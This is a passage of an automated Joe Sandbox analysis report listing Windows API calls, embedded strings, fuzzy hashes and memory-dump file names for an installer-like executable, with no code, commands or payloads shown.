• Instruction Fuzzy Hash: A5112E72604504ABCB40DEA9D8C4D9B7BECEF8D324B6441AAF908DB242D674ED408B68
APIs
• GetClassInfoA.USER32(00400000,0041F470,?), ref: 0041F4A1
• UnregisterClassA.USER32(0041F470,00400000), ref: 0041F4CA
• RegisterClassA.USER32(00499598), ref: 0041F4D4
• SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F50F
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Class$InfoLongRegisterUnregisterWindow
• String ID:
• API String ID: 4025006896-0
• Opcode ID: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
• Instruction ID: 7a0dc659497f48f9aad4428a0df7724adcaf244520b53866b591a9b3b5545ee4
• Opcode Fuzzy Hash: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
• Instruction Fuzzy Hash: F6011B72240104AADA10EBACED81E9B33999729314B11423BB615E72A2D6399C558BAC
APIs
• WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
• GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
• CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4071923889-0
                                                                                                                                        • Opcode ID: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
                                                                                                                                        • Instruction ID: ea90b2abd28d60bbe0c33bbe6d7a83e36ef454db8471bda6b5c19e9a906557d9
                                                                                                                                        • Opcode Fuzzy Hash: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
                                                                                                                                        • Instruction Fuzzy Hash: B9012D31A006097FEB1097AA8C02F6FBBECDF49764F610127F904D72C2C5788D409A78
                                                                                                                                        APIs
                                                                                                                                        • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D027
                                                                                                                                        • LoadResource.KERNEL32(00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58,0000000A,00000000), ref: 0040D041
                                                                                                                                        • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58), ref: 0040D05B
                                                                                                                                        • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?), ref: 0040D065
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3473537107-0
                                                                                                                                        • Opcode ID: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                                                                        • Instruction ID: ce77ce8360aa458f47a01e9b0563465317cd85cc21d7bcd45488e041df035c61
                                                                                                                                        • Opcode Fuzzy Hash: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                                                                        • Instruction Fuzzy Hash: 49F04F726056046F9B14EE59A881D5B77ECDE88268310013AF908E7286DA38DD018B68
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,0049B450,?,?,?,004018B4), ref: 00401566
                                                                                                                                        • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,0049B450,?,?,?,004018B4), ref: 0040158B
                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,0049B450,?,?,?,004018B4), ref: 004015B1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$Alloc$Free
                                                                                                                                        • String ID: uu
                                                                                                                                        • API String ID: 3668210933-2249551878
                                                                                                                                        • Opcode ID: 4da9ee4765cce6e6c7be3d7cc9adf05dad1d6bab5239e3db9b33b19d934b365d
                                                                                                                                        • Instruction ID: ed10fda1d5a177d2a0c43996bc0be7fa2989f050302610c9045c0a13ae1d279a
                                                                                                                                        • Opcode Fuzzy Hash: 4da9ee4765cce6e6c7be3d7cc9adf05dad1d6bab5239e3db9b33b19d934b365d
                                                                                                                                        • Instruction Fuzzy Hash: AFF0C8716403206AEB315A294C85F133AD4DBC5754F104075BE09FF3DAD6B8980082AC
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 004705F1
                                                                                                                                        Strings
                                                                                                                                        • Failed to set NTFS compression state (%d)., xrefs: 00470602
                                                                                                                                        • Setting NTFS compression on file: %s, xrefs: 004705BF
                                                                                                                                        • Unsetting NTFS compression on file: %s, xrefs: 004705D7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast
                                                                                                                                        • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                                                                        • API String ID: 1452528299-3038984924
                                                                                                                                        • Opcode ID: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                                                                        • Instruction ID: 452327faed6fd823952186a677ff1a78a18aba12ee86070aec797b5412e08bdc
                                                                                                                                        • Opcode Fuzzy Hash: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                                                                        • Instruction Fuzzy Hash: A5018B71D09248A6CB04D7AD94512DDBBE49F4D314F44C5FFE459D7342DB780A088B9E
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000), ref: 0046FE45
                                                                                                                                        Strings
                                                                                                                                        • Unsetting NTFS compression on directory: %s, xrefs: 0046FE2B
                                                                                                                                        • Setting NTFS compression on directory: %s, xrefs: 0046FE13
                                                                                                                                        • Failed to set NTFS compression state (%d)., xrefs: 0046FE56
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast
                                                                                                                                        • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                                                                        • API String ID: 1452528299-1392080489
                                                                                                                                        • Opcode ID: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                                                                        • Instruction ID: 6c3eba688a3488f6cff2036d9eec8e6f632fba0cce39d579df3f4bd3b957a0ce
                                                                                                                                        • Opcode Fuzzy Hash: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                                                                        • Instruction Fuzzy Hash: E5014421E0824856CB04D7ADE44129DBBA49F49304F4485BBA495E7253EB790A09879B
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                        • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000,0045B7D5), ref: 00455DD8
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000), ref: 00455DE1
                                                                                                                                        • RemoveFontResourceA.GDI32(00000000), ref: 00455DEE
                                                                                                                                        • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455E02
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4283692357-0
                                                                                                                                        • Opcode ID: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                                                                        • Instruction ID: 71ccc6c4ad223293e5fa71c014565a1ca4f3f808124b73c5b0663eb55104ffd2
                                                                                                                                        • Opcode Fuzzy Hash: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                                                                        • Instruction Fuzzy Hash: 57F0BEB174070036EA10B6BAAC4BF2B26CC8F54745F10883ABA00EF2C3D97CDC04962D
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$CountSleepTick
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2227064392-0
                                                                                                                                        • Opcode ID: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                                                                                                        • Instruction ID: 56d8cd0ebf6ab4a4d31aad6ab38b951dee0ff9c0bbbb70c30f4e079d31b44593
                                                                                                                                        • Opcode Fuzzy Hash: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                                                                                                        • Instruction Fuzzy Hash: C6E0ED6A30921149863131AE98CA6AF4D48CBC2324B28853FE08CE6283C89C4C0A867E
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB,00000000), ref: 0047820D
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB), ref: 00478213
                                                                                                                                        • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478235
                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478246
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 215268677-0
                                                                                                                                        • Opcode ID: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                                                                        • Instruction ID: 91f0679cb69370e855683a510bc75a037ced8834772831ea40795c83ba0b1c60
                                                                                                                                        • Opcode Fuzzy Hash: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                                                                        • Instruction Fuzzy Hash: D8F037716447007BD600E6B58C81E5B73DCEB44354F04493E7E98C71C1DA78DC089776
                                                                                                                                        APIs
                                                                                                                                        • GetLastActivePopup.USER32(?), ref: 0042424C
                                                                                                                                        • IsWindowVisible.USER32(?), ref: 0042425D
                                                                                                                                        • IsWindowEnabled.USER32(?), ref: 00424267
                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 00424271
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2280970139-0
                                                                                                                                        • Opcode ID: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                                                                        • Instruction ID: 2c5ff33fc315f6eb6fab431e1453bcb0e66c5aaaa6596e28cc8dc28fd0b03a53
                                                                                                                                        • Opcode Fuzzy Hash: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                                                                        • Instruction Fuzzy Hash: C7E0EC61B02672D6AE31FA7B2881A9F518C9D45BE434641EBBC04FB38ADB2CDC1141BD
                                                                                                                                        APIs
                                                                                                                                        • GlobalHandle.KERNEL32 ref: 0040626F
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00406276
                                                                                                                                        • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00406281
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$AllocHandleLockUnlock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2167344118-0
                                                                                                                                        • Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                                                                        • Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
                                                                                                                                        • Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                                                                        • Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
                                                                                                                                        APIs
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047BB01,?,00000000,00000000,00000001,00000000,0047A4B5,?,00000000), ref: 0047A479
                                                                                                                                        Strings
                                                                                                                                        • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A2ED
                                                                                                                                        • Failed to parse "reg" constant, xrefs: 0047A480
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close
                                                                                                                                        • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                                                                        • API String ID: 3535843008-1938159461
                                                                                                                                        • Opcode ID: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                                                                        • Instruction ID: 25f2a786541cb687838a6194ffc4a73185deb9e5551b5ad8c851c0bf1152322b
                                                                                                                                        • Opcode Fuzzy Hash: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                                                                        • Instruction Fuzzy Hash: 22817274E00108AFCB10DF95D485ADEBBF9AF88344F50817AE814B7392D739AE05CB99
                                                                                                                                        APIs
                                                                                                                                        • GetForegroundWindow.USER32(00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835C5
                                                                                                                                        • SetActiveWindow.USER32(?,00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835D7
                                                                                                                                        Strings
                                                                                                                                        • Will not restart Windows automatically., xrefs: 004836F6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ActiveForeground
                                                                                                                                        • String ID: Will not restart Windows automatically.
                                                                                                                                        • API String ID: 307657957-4169339592
                                                                                                                                        • Opcode ID: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                                                                        • Instruction ID: 4bdce942002d158aae482430f0c171f92fa141a3e9c551c877f01fd154286bbb
                                                                                                                                        • Opcode Fuzzy Hash: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                                                                        • Instruction Fuzzy Hash: 7F414870648240BFD321FF68DC92B6D3BE49718B09F6448B7E440573A2E37D9A059B1D
                                                                                                                                        APIs
                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764B0
                                                                                                                                        • SetFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764C4
                                                                                                                                        Strings
                                                                                                                                        • Extracting temporary file: , xrefs: 004763EC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileTime$Local
                                                                                                                                        • String ID: Extracting temporary file:
                                                                                                                                        • API String ID: 791338737-4171118009
                                                                                                                                        • Opcode ID: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                                                                        • Instruction ID: 173659db1c42fed311bbc77dc24fc0b62308bfde4479aaaaa113f8cb774a82d8
                                                                                                                                        • Opcode Fuzzy Hash: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                                                                        • Instruction Fuzzy Hash: 9541B670E00649AFCB01DFA5C892AAFBBB9EB09704F51847AF814A7291D7789905CB58
                                                                                                                                        Strings
                                                                                                                                        • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CD38
                                                                                                                                        • Failed to proceed to next wizard page; aborting., xrefs: 0046CD24
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                                                                        • API String ID: 0-1974262853
                                                                                                                                        • Opcode ID: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                                                                        • Instruction ID: bcb3787111d781b294161d03010f6e791927551fc3c7e501f8e48cd77162cd73
                                                                                                                                        • Opcode Fuzzy Hash: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                                                                        • Instruction Fuzzy Hash: A531C430604204DFD711EB59D9C5BA977F5EB06304F5500BBF448AB392D7786E40CB49
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
